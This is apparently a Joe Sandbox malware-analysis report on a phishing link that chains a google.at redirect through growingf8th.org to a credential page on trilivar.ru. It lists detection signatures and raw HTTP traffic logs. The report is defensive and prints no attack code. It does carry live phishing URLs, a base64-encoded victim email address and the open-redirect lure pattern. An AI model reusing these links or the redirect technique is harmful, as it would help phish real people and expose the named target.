Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=

Overview

General Information

Sample URL:https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF
Analysis ID:1586014
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 3040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1936,i,4928317751555499273,12545574023170528116,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 5588 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://growingf8th.org/favicon.icoAvira URL Cloud: Label: phishing
Source: https://rixolo.trilivar.ru/mwAdur/Avira URL Cloud: Label: phishing
Source: https://rixolo.trilivar.ru/favicon.icoAvira URL Cloud: Label: phishing

Phishing

barindex
Source: 1.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://rixolo.trilivar.ru/mwAdur/#Wpate.rowell@ch... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of evading detection and potentially carrying out phishing or other malicious activities.
Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://rixolo.trilivar.ru/mwAdur/#Wpate.rowell@ch... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have a legitimate purpose, the overall behavior is highly suspicious and indicative of malicious intent.
Source: https://rixolo.trilivar.ru/mwAdur/#Wpate.rowell@cherokeebrick.comHTTP Parser: No favicon
Source: https://rixolo.trilivar.ru/mwAdur/#Wpate.rowell@cherokeebrick.comHTTP Parser: No favicon
Source: https://rixolo.trilivar.ru/mwAdur/#Wpate.rowell@cherokeebrick.comHTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.at to http://growingf8th.org/t2dolalrwe/ynrmr4aus6zyxkilbmuyfz8pyol/cgf0zs5yb3dlbgxay2hlcm9rzwvicmljay5jb20=
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20= HTTP/1.1Host: www.google.atConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20= HTTP/1.1Host: www.google.atConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=hgrMPCeFRKrCHnp1FKVMIVDcsy3rTAxBRPaPGughuS2uPXcxbDeM1fTLSnui4ttTuVBkfFc50RyHL4Tkua9kjpGAD2Q-gcMQESveF-0djBxXu85thCymyN-7vGw2UDBUCbD0g7ZzfDFkerXeHq52qw5tAs4Q0KCZ3gwCZfQeVPdN-0HKeYjgDipFAoTJjBIHopsy
Source: global trafficHTTP traffic detected: GET /mwAdur/ HTTP/1.1Host: rixolo.trilivar.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://growingf8th.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rixolo.trilivar.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rixolo.trilivar.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rixolo.trilivar.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://rixolo.trilivar.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fed21b6fd66c343&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rixolo.trilivar.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rixolo.trilivar.ru/mwAdur/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImNzS1ZJdkxENGtoUElDUnRzNXoycFE9PSIsInZhbHVlIjoiVjA4bDNESk5nTFE0T1hCb2tZSlg1N3d1ZytCL29Zb3ZBSlQ5dHpCZnVFV3d2R0I2MEpuNmV2Nllnc2ZtenJRcm5Sb3d1empFWEtneUdDWnNqbTVJT3NTSkg0WGNzQUFPK05DUWxsdmc2ZHZMbWQzL3JPand6NER5L09LcHZ1ZWsiLCJtYWMiOiJkOThjYWQzYzk3ZDUyZmQyNGE1YmVjNzI0MWFlNjRjNmNhMDkyM2U2ZGVlMTQwNmZlZmFmODZlNDYzNzlkNzA1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZQNFR6cG9UZ1pyYjJCZTlTNGxidEE9PSIsInZhbHVlIjoiSjNoTG5OMHZ2TXA2QlZKMm90aDVCOUY2MHozcFBKTFdzbmowSG9SMWczR1Y3clNBYUZ5VVRJTi9IUTZBUXR5OWVWU2lkT1A1ZHhRWlVPalhKcGdjUmFkZUFOeE0xbGlSSHc5MGJLVndFeTNVK21mSlpLSlVwM3RxVUM2VjBYZFUiLCJtYWMiOiJlMzFmMmI5ODcwNmVkMGNjNTA1MzhlZDQwY2NhZTQ2M2IxZmJjYTYyY2FjMjIzNTQyZTk4MjliZjA0ZTdhNDkwIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fed21b6fd66c343&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8fed21b6fd66c343/1736349209947/fec74b01aadc5e177f85ca6ea56ff1b6f476dfc786c37e6d5d0521cef9237b61/2J4z9yOx--AhckF HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1391608476:1736346727:knR3U4ghk5DvrWm8Z0ppO7GRdQqqvFtYvV0BfWnt7jY/8fed21b6fd66c343/uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVR HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fed21b6fd66c343/1736349209949/chY3ZxDNJThTUgV HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fed21b6fd66c343/1736349209949/chY3ZxDNJThTUgV HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1391608476:1736346727:knR3U4ghk5DvrWm8Z0ppO7GRdQqqvFtYvV0BfWnt7jY/8fed21b6fd66c343/uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVR HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1391608476:1736346727:knR3U4ghk5DvrWm8Z0ppO7GRdQqqvFtYvV0BfWnt7jY/8fed21b6fd66c343/uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVR HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20= HTTP/1.1Host: growingf8th.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: growingf8th.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.google.at
Source: global trafficDNS traffic detected: DNS query: growingf8th.org
Source: global trafficDNS traffic detected: DNS query: rixolo.trilivar.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1391608476:1736346727:knR3U4ghk5DvrWm8Z0ppO7GRdQqqvFtYvV0BfWnt7jY/8fed21b6fd66c343/uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVR HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3166sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVRsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:13:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 6895Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Box6U4xdR9TgzUo88iY9QlyFAFrnbz447mwNzfTkbFmI7sIhUI8iNwtK%2B1KP8QbUj9u23mi81qn9kzXM9FBup1DahQBj7IqFkTk3QIRX2ntCdlQab0NS%2Bqgftq5MQQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=47972&min_rtt=47749&rtt_var=13764&sent=5&recv=8&lost=0&retrans=1&sent_bytes=4249&recv_bytes=2257&delivery_rate=22243&cwnd=251&unsent_bytes=0&cid=109b5dd2bdd92949&ts=128&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8fed21be885d8cc8-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2008&min_rtt=1982&rtt_var=762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1900&delivery_rate=1473259&cwnd=237&unsent_bytes=0&cid=61926b2534517cb9&ts=4080&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:13:31 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: g/3PZRKCPmio969dL8IPNAeUh5hhipJ57Sg=$BI1iq1JcsQGmsf4fServer: cloudflareCF-RAY: 8fed21ca5acec3ff-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:13:34 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: s7Z1sNY8sNFEsl6TI7hH3OvG0xTQZvSzkxE=$Q4sxhdClg2n1K/kdServer: cloudflareCF-RAY: 8fed21de28f5f5f7-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:13:39 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: M4CZU4xaM4qpYms+h1W61vexHwqXlBz4wec=$xQtLCYnmRj6V04r2Server: cloudflareCF-RAY: 8fed21fecf92425f-EWRalt-svc: h3=":443"; ma=86400
